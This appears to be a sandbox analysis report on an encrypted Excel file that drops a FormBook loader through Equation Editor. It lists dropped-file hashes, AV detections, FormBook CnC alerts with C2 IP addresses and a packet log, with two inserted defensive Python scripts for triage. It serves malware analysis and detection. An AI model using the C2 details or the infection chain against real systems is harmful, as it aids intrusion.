                                                      SHA1:63C2213EA0752D4CD33BC4CD26BE1F6A5D5A5A4D
                                                      SHA-256:1408C1FF01630D3A5FBAE695DB2B399CBDA3C4B4B43DB12B80AC8DB5C294A899
                                                      SHA-512:CCF6C11A894171BE04737442D3BE0F4A843679B1D7E18E3458EBB74768FAB441522C4AA34FF877A50C902501EC68744A43747187BF23A284EF07E94832312212
                                                      Malicious:false
                                                      Preview:..Voo..........x.o^./y^b..^./y^b...xgo..k7ooo.x.on.[n._..g..pooo....n.[n._..g...ooo...#n.[n._..g.."ooo....n.[n._..g..1ooo./.3.._s.mW.z/rr.[......_..sB........k.s$B.m_|f...r.k.s%.k...x....mB.oooo.sSX.:xkn..|n..}n....n./.|n...n....i._v..[fv...O..d..n...}.W^X..rxk.oooo..SsRooo.sS`..x...........%[o.....^./y^b.g.W.o..[.O.W.o._.c$.g.$s.k.W.o..W.d.g.k...%[owI]....eoo..eoo%cowyn...yeoo..eoo%Wow`.....eoo..eoo%Wo.....7^./y^b....g_ooo....k..go.I.k.oo.k..k.g..g...cXoo./...W.mW|z.o.`..`.....mW|$.o.`..`.memW.z/o.X..wyn....doo..!pnn...^....n.W..nnn.....o.Y.x.o.V...dooo.....%so......^./y^b....g7ooo../.k..go.I.k.oo.k..k.g..g....soo./^..ooo.W.mW|z.o.`/.`3.[.mW|$.o.`/.`3._.mW|...`/.`3.cB.mW}z.r.H/.H3....mW|$.e.`/.`3mXmW.z/o.X/.wI]....ooo...knn....Go.W...G.d.Fn.Gn.cn._n.[n.W..qnn.....o.Y.x.o.V...dooo.....%co.....K..g_ooo....k..go.I.k.oo.k..k.g..g...mroo./...W.mW|z.o.`..`..[.mW|$.o.`..`.memW.z/o.X..w`....6ooo..Sknn...an.
                                                      Process:C:\Users\Public\vbc.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):265931
                                                      Entropy (8bit):7.698831475857815
                                                      Encrypted:false
                                                      SSDEEP:6144:yXhg4DlE7dYexg5uqPw9CNu4dvSX0G99R+1KWGUDw:D4BEJYeyxgCNl5i0GYSU
                                                      MD5:C02929E25042F9942FF27C1DB38973E3
                                                      SHA1:86AA91161B74491FA9F8F9FC8D8EE0A0FCF22ED8
                                                      SHA-256:ADD5757B03B27815F1B5A2E900C2995E7A077E5E46AFD6CE5E57953888F19156
                                                      SHA-512:0C6A051D6B6270ED1CB77C104FAC5731A71D8D44933A0CDA7DC0D88A65A30221F732F3D457A9CF8311848394A9F20E3B733802BCF1E3F26A28FE5E9B39219AA4
                                                      Malicious:false
                                                      Preview:.Y......,.......................,C.......X......yY..........................................................................................................................................................................................................................................J...............o...j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\Public\vbc.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):20992
                                                      Entropy (8bit):5.741923007087739
                                                      Encrypted:false
                                                      SSDEEP:384:i46PUQ1aldbpD3HXY0QmwiEiTIYKopaZUb6xhbof3b:i4G1albrXY0HwinMdZeUhbovb
                                                      MD5:FF94AC3A49E4C0BCDF0C1FE9730293D9
                                                      SHA1:2F81D5B8EC6515FBDFA099EABB0BABF9D6C40B97
                                                      SHA-256:4D2A5F508E4D6A54D71AF82FCEA978527CDD216423FB050457DFEB4DB581178F
                                                      SHA-512:01F8BC3AC735473C60E842D76D282F4859FD9FECADA580BFFC629A8127A821A0839ED832143C7034B3A1E3DFCA9561841626F0B8FBE582CB6A0E7DAB453A5A16
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 46%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q...0...0...0...[...0...0..0..Mn...0..Mn...0..Hn...0..Mn...0..Rich.0..................PE..L...a..a...........!.....@...................P............................................@.........................0Q..H...xQ.......`.......................p.......................................................P..0............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.rsrc........`.......N..............@..@.reloc.......p.......P..............@..B........................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\Public\vbc.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):216745
                                                      Entropy (8bit):7.992922002092465
                                                      Encrypted:true
                                                      SSDEEP:6144:dhg4DlE7dYexg5uqPw9CNu4dvSX0G99R+1f:g4BEJYeyxgCNl5i0GYN
                                                      MD5:1FABB2AB23318AC4B366E2FFB75034DD
                                                      SHA1:A2ADE2676E8FA328D4A8C3640AE9BA14334BC2B2
                                                      SHA-256:FAE6FF46EBDC2CFE9DBADD442892F2B569D048CFB4BCC560E32D501DD4A03F96
                                                      SHA-512:6FDF083748944B9A00A2D4C57B1B832AE45C7A5E845A074890BBDADBD94967DC255EEDE9BEEDEA45CE4355E4AEE8567A42D54B85A06393A41D762E37134DB662
                                                      Malicious:false
                                                      Preview:.W.m.G.Q...w..*.9..;.1h.....G"...z*.6k......*..i.e.%.].,...-......k......n.I..M...j..j>...`.kA\w....4....>.D.e..3.........,..D<."+.$..^.]wl.*..>..^E..l..P._...QN0A.o.........N.3.....K';M.+L.......(P&.Go`...|nrJJ3.+..Q:n..]L..s.p...`pf..#.0......P2:.dG.Q..........]..,\....G"..}.z..6k...I..*..i.e.%.].,.^.-............>.5M{.K.B0..{..:|..o1W.<.2n...c...M.d6............,..U...x(.&.{.._..........SbWij<..2&.g.`eiZ.+.x......3..#..t.MEU...w.....(*&6........rJJ3.+...]...L...f.p.w.`.f.!#..........2D.dG.Q....x......W...\.O..3G"...z*.6k......*..i.e.%.].,.^.-............>.5M{.K.B0..{..:|..o1W.<.2n...c...M.d6............,..U...x(.&.{.._..........SbWij<..2&.g.`eiZ.+.x....N.3.Q...|.MEW.........(*&6......nrJJ3.+...]...L...f.p.w.`.f.!#..........2D.dG.Q....x......W...\.O..3G"...z*.6k......*..i.e.%.].,.^.-............>.5M{.K.B0..{..:|..o1W.<.2n...c...M.d6............,..U...x(.&.{.._..........SbWij<..2&.g.`eiZ.+.x....N.3.Q...|.MEW.........(*&6......nrJJ3.+...]...L.
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):512
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                      Malicious:false
                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:CDFV2 Encrypted
                                                      Category:dropped
                                                      Size (bytes):191880
                                                      Entropy (8bit):7.958354274541763
                                                      Encrypted:false
                                                      SSDEEP:3072:C8Sc+d6FVAVpIxRM/+fY89ahUriG65R1UAErtnNz39U/NjnFhayD0BbR6Q:rbnyVpIrqOYGV6NUA2Nra/lFhD49IQ
                                                      MD5:9A0E6F87707210A385EF8ED3BF348DE3
                                                      SHA1:800A9F004B17CD24413EB98C2F6D9FCD02128887
                                                      SHA-256:41B58CDDCA86E32E7034DAF8E97DCDAA04AC6CDCB41EAE86BE1C3FA7FD05C871
                                                      SHA-512:E35A536E9D68DA1CC14EA854D977490ED6865CC756C23D479D6A37572F004C2F6B0AB475C9F765434588C827721B3FBC72CF5A33CF6144B92FC205BDC7A96269
                                                      Malicious:false
                                                      Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):512
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                      Malicious:false
                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):512
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                      Malicious:false
                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):165
                                                      Entropy (8bit):1.4377382811115937
                                                      Encrypted:false
                                                      SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                      MD5:797869BB881CFBCDAC2064F92B26E46F
                                                      SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                      SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                      SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                      Malicious:false
                                                      Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Category:dropped
                                                      Size (bytes):254186
                                                      Entropy (8bit):7.930341504736443
                                                      Encrypted:false
                                                      SSDEEP:6144:owKdM+LrFcBAEMQK74gFWVE2BvubTUe+xdemO+:uHLrODMV4zVfvubb+L1
                                                      MD5:C2CA2BA9C38EB02217588662717BA6C3
                                                      SHA1:8A897F24D2E564AF2C2FCC272AB0CFBEF10611B5
                                                      SHA-256:9AF4D9EF8B2A850854AE23411D44D3603147C26898BCA1010FD2F9B16F6D456E
                                                      SHA-512:7C7A80F37013B8B5FE27E0C9C3144884ABDE6CA49484C3E8C6CC78DAA9F3B6AC890577247223E7D4875B865244E8732840C6A47170FBE2C7F27406BA4C8F52A6
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 35%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.......p....@..........................................................................s.......................................................................................p...............................text...vY.......Z.................. ..`.rdata.......p.......^..............@..@.data................p..............@....ndata.......@...........................rsrc................t..............@..@........................................................................................................................................................................................................................................................................................................................................................
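The dropped-file table above is what a responder works from when deciding which drops matter: the process that wrote the file (EQNEDT32.EXE writing a PE32, vbc.exe running from C:\Users\Public), the MZ header visible in the preview, the AV verdicts, and the 8-bit entropy of the opaque "data" blobs. The following is an added example, not Joe Sandbox's own code: it re-parses a handful of the report's own records (transcribed into the script, with the hash and size fields trimmed) and applies a few triage rules. The rule names, the entropy cut-off of 7.9 and the Public-directory check are this example's assumptions, not the sandbox's scoring.

```python
"""Triage of the dropped-file records in this report (added example, not
Joe Sandbox's own code). The sandbox prints each dropped file as a run of
'Key:Value' lines; this re-parses a few of those records and applies
simple triage rules. Rule names and the entropy cut-off are assumptions."""
import math
import re
from collections import Counter
from typing import Dict, List

# Constructed sample: four records transcribed from the report's table,
# hash/size fields trimmed and previews shortened.
SAMPLE = r"""
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
Entropy (8bit):7.932023348968795
SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
Preview:.PNG........IHDR
Process:C:\Users\Public\vbc.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Entropy (8bit):5.741923007087739
SHA-256:4D2A5F508E4D6A54D71AF82FCEA978527CDD216423FB050457DFEB4DB581178F
Antivirus:
• Antivirus: ReversingLabs, Detection: 46%
Preview:MZ......................@.....
Process:C:\Users\Public\vbc.exe
File Type:data
Entropy (8bit):7.992922002092465
SHA-256:FAE6FF46EBDC2CFE9DBADD442892F2B569D048CFB4BCC560E32D501DD4A03F96
Preview:.W.m.G.Q...w..*.9..;.1h
Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):7.930341504736443
SHA-256:9AF4D9EF8B2A850854AE23411D44D3603147C26898BCA1010FD2F9B16F6D456E
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 35%
Preview:MZ......................@.....
"""

KEY_RE = re.compile(r"^([^:]+):(.*)$")
ENTROPY_CUTOFF = 7.9                 # assumed cut-off for "looks encrypted/packed"
PUBLIC_DIR = "c:\\users\\public\\"   # world-writable drop location seen in the report


def parse_records(text: str) -> List[Dict]:
    """One dict per dropped file; a record starts at each 'Process:' line and
    the '•' bullet lines under 'Antivirus:' are collected into rec['av']."""
    records: List[Dict] = []
    cur = None
    for line in (ln.strip() for ln in text.splitlines()):
        if not line:
            continue
        if line.startswith("•") and cur is not None:
            cur["av"].append(line.lstrip("• "))
            continue
        m = KEY_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Process":
            cur = {"av": []}
            records.append(cur)
        if cur is not None:
            cur[key] = value
    return records


def triage(rec: Dict) -> List[str]:
    """Names of the triage rules a record trips, in a fixed order."""
    hits = []
    proc = rec.get("Process", "")
    is_pe = rec.get("Preview", "").startswith("MZ")   # DOS stub magic in the preview
    if proc.rsplit("\\", 1)[-1].upper() == "EQNEDT32.EXE" and is_pe:
        hits.append("equation_editor_drops_pe")       # Equation Editor has no business writing PE files
    if proc.lower().startswith(PUBLIC_DIR):
        hits.append("process_in_public_dir")
    if rec["av"]:
        hits.append("av_detection")
    if rec.get("File Type") == "data" and float(rec.get("Entropy (8bit)", "0")) >= ENTROPY_CUTOFF:
        hits.append("high_entropy_blob")              # opaque near-random data next to a loader
    return hits


def triage_report(text: str) -> Dict[str, List[str]]:
    return {r["SHA-256"]: triage(r) for r in parse_records(text)}


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy, the quantity behind the report's 'Entropy (8bit)' field."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


if __name__ == "__main__":
    for sha, hits in triage_report(SAMPLE).items():
        print(sha[:16], hits or "-")
    # The report's three 512-byte drops with entropy 0.0 are single-valued buffers:
    print(shannon_entropy(b"\x00" * 512))
```

The PNG written by EXCEL.EXE trips nothing; the DLL and the high-entropy blob are flagged because vbc.exe runs from the world-writable Public directory; the NSIS-packed executable is flagged because EQNEDT32.EXE wrote an MZ file. The entropy helper reproduces the 0.0 the report gives for its 512-byte zero-filled drops and 8.0 for uniformly distributed bytes, which is why a 7.99 on a "data" file is worth a look.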
                                                      File type:CDFV2 Encrypted
                                                      Entropy (8bit):7.958354274541763
                                                      TrID:
                                                      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                      File name:W6902.xlsx
                                                      File size:191880
                                                      MD5:9a0e6f87707210a385ef8ed3bf348de3
                                                      SHA1:800a9f004b17cd24413eb98c2f6d9fcd02128887
                                                      SHA256:41b58cddca86e32e7034daf8e97dcdaa04ac6cdcb41eae86be1c3fa7fd05c871
                                                      SHA512:e35a536e9d68da1cc14ea854d977490ed6865cc756c23d479d6a37572f004c2f6b0ab475c9f765434588c827721b3fbc72cf5a33cf6144b92fc205bdc7a96269
                                                      SSDEEP:3072:C8Sc+d6FVAVpIxRM/+fY89ahUriG65R1UAErtnNz39U/NjnFhayD0BbR6Q:rbnyVpIrqOYGV6NUA2Nra/lFhD49IQ
                                                      File Content Preview:........................>......................................................................................................................................................................................................................................
                                                      Icon Hash:e4e2aa8aa4b4bcb4
Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP        Dest IP
01/28/22-22:38:38.511356  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49166        80         192.168.2.22     1.32.255.137
01/28/22-22:38:38.511356  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49166        80         192.168.2.22     1.32.255.137
01/28/22-22:38:38.511356  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49166        80         192.168.2.22     1.32.255.137
01/28/22-22:38:43.922128  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49167      37.123.118.150   192.168.2.22
01/28/22-22:38:48.985672  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49169        80         192.168.2.22     194.5.156.29
01/28/22-22:38:48.985672  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49169        80         192.168.2.22     194.5.156.29
01/28/22-22:38:48.985672  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49169        80         192.168.2.22     194.5.156.29
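Reading the alert table against the packet log is how the C2 contacts get tied to concrete conversations: three ET FormBook check-in rules fire on the connection from port 49166 to 1.32.255.137, a server at 37.123.118.150 answers port 49167 with a 403, and the same three rules fire again on port 49169 to 194.5.156.29. The following is an added example, not Joe Sandbox's own code: it takes the report's alert rows and the first ten rows of its packet table (transcribed into the script with one space-separated column per field), builds one record per client/server conversation, counts packets in each direction, attaches the SIDs that fired on each conversation, and lists the remote hosts hit by a CnC rule. Treating the analysis host's address (192.168.2.22 in the report) as the client side of every conversation is this example's assumption.

```python
"""Correlate the report's IDS alerts with its TCP packet log (added example,
not Joe Sandbox's own code). Conversations are keyed as
(client_ip, client_port, server_ip, server_port); the analysis host is
assumed to be the client side."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# Constructed sample: the seven alert rows from the report, one space-separated column per field.
ALERT_LINES = [
    "01/28/22-22:38:38.511356 TCP 2031453 ET TROJAN FormBook CnC Checkin (GET) 49166 80 192.168.2.22 1.32.255.137",
    "01/28/22-22:38:38.511356 TCP 2031449 ET TROJAN FormBook CnC Checkin (GET) 49166 80 192.168.2.22 1.32.255.137",
    "01/28/22-22:38:38.511356 TCP 2031412 ET TROJAN FormBook CnC Checkin (GET) 49166 80 192.168.2.22 1.32.255.137",
    "01/28/22-22:38:43.922128 TCP 1201 ATTACK-RESPONSES 403 Forbidden 80 49167 37.123.118.150 192.168.2.22",
    "01/28/22-22:38:48.985672 TCP 2031453 ET TROJAN FormBook CnC Checkin (GET) 49169 80 192.168.2.22 194.5.156.29",
    "01/28/22-22:38:48.985672 TCP 2031449 ET TROJAN FormBook CnC Checkin (GET) 49169 80 192.168.2.22 194.5.156.29",
    "01/28/22-22:38:48.985672 TCP 2031412 ET TROJAN FormBook CnC Checkin (GET) 49169 80 192.168.2.22 194.5.156.29",
]
# Constructed sample: the first ten rows of the report's packet table.
FLOW_LINES = [
    "Jan 28, 2022 22:37:20.837547064 CET 49165 80 192.168.2.22 212.192.246.120",
    "Jan 28, 2022 22:37:20.867412090 CET 80 49165 212.192.246.120 192.168.2.22",
    "Jan 28, 2022 22:37:20.867518902 CET 49165 80 192.168.2.22 212.192.246.120",
    "Jan 28, 2022 22:37:20.867891073 CET 49165 80 192.168.2.22 212.192.246.120",
    "Jan 28, 2022 22:37:20.896116972 CET 80 49165 212.192.246.120 192.168.2.22",
    "Jan 28, 2022 22:37:20.896161079 CET 80 49165 212.192.246.120 192.168.2.22",
    "Jan 28, 2022 22:37:20.896184921 CET 80 49165 212.192.246.120 192.168.2.22",
    "Jan 28, 2022 22:37:20.896198988 CET 49165 80 192.168.2.22 212.192.246.120",
    "Jan 28, 2022 22:37:20.896209955 CET 80 49165 212.192.246.120 192.168.2.22",
    "Jan 28, 2022 22:37:20.896229982 CET 49165 80 192.168.2.22 212.192.246.120",
]

ConvKey = Tuple[str, int, str, int]


@dataclass
class Conversation:
    first_seen: Optional[str] = None
    to_server: int = 0
    to_client: int = 0
    sids: Set[int] = field(default_factory=set)
    messages: Set[str] = field(default_factory=set)


def parse_alert(line: str) -> Tuple[str, str, int, str, int, int, str, str]:
    """The message may contain spaces, so peel fixed fields off both ends."""
    ts, proto, sid, rest = line.split(None, 3)
    msg, sport, dport, sip, dip = rest.rsplit(None, 4)
    return ts, proto, int(sid), msg, int(sport), int(dport), sip, dip


def parse_flow(line: str) -> Tuple[str, int, int, str, str]:
    """The timestamp contains spaces and a comma; the last four fields are fixed."""
    ts, sport, dport, sip, dip = line.rsplit(None, 4)
    return ts, int(sport), int(dport), sip, dip


def conv_key(sip: str, sport: int, dip: str, dport: int, local_ip: str) -> Tuple[ConvKey, bool]:
    """Orient the 4-tuple so the analysis host is the client; also report
    whether this packet travels client -> server."""
    if sip == local_ip:
        return (sip, sport, dip, dport), True
    return (dip, dport, sip, sport), False


def correlate(alert_lines: List[str], flow_lines: List[str],
              local_ip: str = "192.168.2.22") -> Dict[ConvKey, Conversation]:
    convs: Dict[ConvKey, Conversation] = {}
    for line in flow_lines:
        ts, sport, dport, sip, dip = parse_flow(line)
        key, outbound = conv_key(sip, sport, dip, dport, local_ip)
        c = convs.setdefault(key, Conversation())
        if c.first_seen is None:
            c.first_seen = ts
        if outbound:
            c.to_server += 1
        else:
            c.to_client += 1
    for line in alert_lines:
        _, _, sid, msg, sport, dport, sip, dip = parse_alert(line)
        key, _ = conv_key(sip, sport, dip, dport, local_ip)
        c = convs.setdefault(key, Conversation())   # alert without captured packets still gets a record
        c.sids.add(sid)
        c.messages.add(msg)
    return convs


def c2_iocs(convs: Dict[ConvKey, Conversation]) -> Set[str]:
    """Server addresses of conversations on which a CnC rule fired."""
    return {key[2] for key, c in convs.items() if any("CnC" in m for m in c.messages)}


if __name__ == "__main__":
    convs = correlate(ALERT_LINES, FLOW_LINES)
    for key, c in sorted(convs.items()):
        print(key, "out", c.to_server, "in", c.to_client, "sids", sorted(c.sids))
    print("C2 IOCs:", sorted(c2_iocs(convs)))
```

The 403 alert is kept as its own conversation record (server 37.123.118.150, client port 49167) but does not enter the IOC set, since SID 1201 is a response rule rather than a check-in signature; whether that host is part of the bot's domain list is not something the alert alone establishes.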
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Jan 28, 2022 22:37:20.837547064 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.867412090 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.867518902 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.867891073 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.896116972 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.896161079 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.896184921 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.896198988 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.896209955 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.896229982 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.896234989 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.896235943 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.896239042 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.896262884 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.896275043 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.896290064 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.896295071 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.896315098 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.896326065 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.896339893 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.896348953 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.896365881 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.896375895 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.896394014 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.909544945 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.922305107 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.922348022 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.922373056 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.922372103 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.922398090 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.922400951 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.922405005 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.922425032 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.922435045 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.922451973 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.922456026 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.922478914 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.922486067 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.922503948 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.922509909 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.922529936 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.922539949 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.922557116 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.922569036 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.922581911 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.922585011 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.922607899 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.922616959 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.922633886 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.922652006 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.922653913 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.922667027 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.922678947 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.922683001 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.922702074 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.922712088 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.922725916 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.922728062 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.922750950 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.922760010 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.922775984 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.922784090 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.922801971 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.922811031 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.922835112 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.923578978 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.948632002 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.948674917 CET  80           49165      212.192.246.120  192.168.2.22
